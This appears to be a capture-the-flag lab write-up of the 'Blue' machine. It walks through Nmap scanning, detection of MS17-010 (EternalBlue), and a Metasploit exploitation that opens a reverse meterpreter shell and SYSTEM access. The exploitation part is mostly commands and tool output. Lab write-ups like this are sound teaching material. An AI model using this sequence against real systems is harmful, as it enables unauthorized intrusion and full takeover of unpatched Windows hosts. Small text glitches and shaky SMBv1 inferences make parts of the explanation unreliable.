Blue
Scanning
# Nmap 7.94SVN scan initiated Fri Mar 14 20:07:43 2025 as: nmap -sC -sV -oN nmap 10.10.22.152
Nmap scan report for 10.10.22.152
Host is up (0.033s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: JON-PC
| NetBIOS_Domain_Name: JON-PC
| NetBIOS_Computer_Name: JON-PC
| DNS_Domain_Name: Jon-PC
| DNS_Computer_Name: Jon-PC
| Product_Version: 6.1.7601
|_ System_Time: 2025-03-15T00:09:08+00:00
|_ssl-date: 2025-03-15T00:09:13+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2025-03-14T00:07:24
|_Not valid after: 2025-09-13T00:07:24
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:ea:88:94:7d:bf (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-03-15T00:09:08
|_ start_date: 2025-03-15T00:07:22
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-03-14T19:09:08-05:00
|_clock-skew: mean: 59m59s, deviation: 2h14m10s, median: 0s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 14 20:09:14 2025 -- 1 IP address (1 host up) scanned in 90.66 seconds
I have 9 open ports: 135 msrpc, 139 netbios-ssn, 445 microsoft-ds, 3389 ssl/ms-wbt-server?, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49158 msrpc, and 49159 msrpc. These ports are common to find open in a Windows system.
Enumeration
From this Nmap scan, I can see the operating system version, which is a Windows 7 Pro Service pack 1 and the SMB v1. To find out that the SMB is version 1 there are a few indicators that confirm such:
- Presence of Ports 139 and 445
- Port 139 (NetBIOS-SSN): Used by SMB over NetBIOS, typically associated with SMBv1.
- Port 445 (Microsoft-DS): Used by SMB directly over TCP without NetBIOS.
- Lack of SMBv2 Protocol Details
- asdaThe scan does not list SMBv2 explicitly. If SMBv2 or SMBv3 were enforced, you would see more details under
smb2-security-modeandsmb2-time. - SMB Message Signing is Disabled
message_signing: disabledappears in thesmb-security-modescript output.- While message signing is optional in SMBv2, it's typically disabled in SMBv1 by default, making it a common indicator of SMBv1 being enabled.
- Windows Version (Windows 7 SP1)
- Windows 7 (especially without modern patches) still supports SMBv1 by default.
- Since the scan identifies Windows 7 Professional 7601 Service Pack 1, it's likely that SMBv1 is still enabled unless explicitly disabled by the administrator.
- No SMBv2 Negotiation Detected
- The smb2-security-mode script output only shows:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required - If SMBv1 were fully disabled, you would typically see more details about SMBv2/SMBv3 negotiation.
So these are the indications of an Eternal Blue vulnerability. To further confirm the presence of such vulnerability I run a vulnerability scan with Nmap nmap --script=*vuln* 10.10.22.152 where *vuln* means run every script that contains the substring "vuln" in the name. In this way, I don't have to specify all the scripts manually or run one-by-one scripts for vulnerability scans.
# Nmap 7.94SVN scan initiated Fri Mar 14 20:11:55 2025 as: nmap --script=*vuln* -oN vuln-scan 10.10.22.152
Nmap scan report for 10.10.22.152
Host is up (0.030s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
135//tcp open msrpc
139//tcp open netbios-ssn
445//tcp open microsoft-ds
3389//tcp open ms-wbt-server
49152//tcp open unknown
49153//tcp open unknown
49154//tcp open unknown
49158//tcp open unknown
49159//tcp open unknown
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https:////blogs.technet.microsoft.com//msrc//2017//05//12//customer-guidance-for-wannacrypt-attacks//
| https:////cve.mitre.org//cgi-bin//cvename.cgi?name=CVE-2017-0143
|_ https:////technet.microsoft.com//en-us//library//security//ms17-010.aspx
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
# Nmap done at Fri Mar 14 20:13:22 2025 -- 1 IP address (1 host up) scanned in 87.08 seconds
Nmap also confirms the presense of the vulnerability Eternal Blue which is also indicated as ms17-010 or CVE-2017-0143.
Exploitation
To exploit this vulnerability I will use Metasploit (msfconsole) and search for Eternal Blue.
$ msfconsole
Metasploit tip: View all productivity tips with the tips command
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.4.18-dev ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search Eternal Blue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
msf6 >
Now I can select the first exploit hoping it works, if not I will try each. After choosing the exploit I have to check the available options and set them.
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metaspl
oit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects
Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Wind
ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
ines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server
2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.232.74
RHOSTS => 10.10.232.74
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.21.112.161
LHOST => 10.21.112.161
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.232.74 yes The target host(s), see https://docs.metasploit.com/docs/using-metaspl
oit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects
Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Wind
ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
ines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server
2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.21.112.161 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) >
The only thing that remains now is to exploit it!
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.21.112.161:4444
[*] 10.10.232.74:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.232.74:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.232.74:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.232.74:445 - The target is vulnerable.
[*] 10.10.232.74:445 - Connecting to target for exploitation.
[+] 10.10.232.74:445 - Connection established for exploitation.
[+] 10.10.232.74:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.232.74:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.232.74:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.232.74:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.232.74:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.232.74:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.232.74:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.232.74:445 - Sending all but last fragment of exploit packet
[*] 10.10.232.74:445 - Starting non-paged pool grooming
[+] 10.10.232.74:445 - Sending SMBv2 buffers
[+] 10.10.232.74:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.232.74:445 - Sending final SMBv2 buffers.
[*] 10.10.232.74:445 - Sending last fragment of exploit packet!
[*] 10.10.232.74:445 - Receiving response from exploit packet
[+] 10.10.232.74:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.232.74:445 - Sending egg to corrupted connection.
[*] 10.10.232.74:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.10.232.74
[*] Meterpreter session 1 opened (10.21.112.161:4444 -> 10.10.232.74:49194) at 2025-03-17 19:25:08 -0400
[+] 10.10.232.74:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.232.74:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.232.74:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
To get the shell I can simply run the command shell.
meterpreter > shell
Process 1520 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
At this point, you can search the system for the flags in the time needed.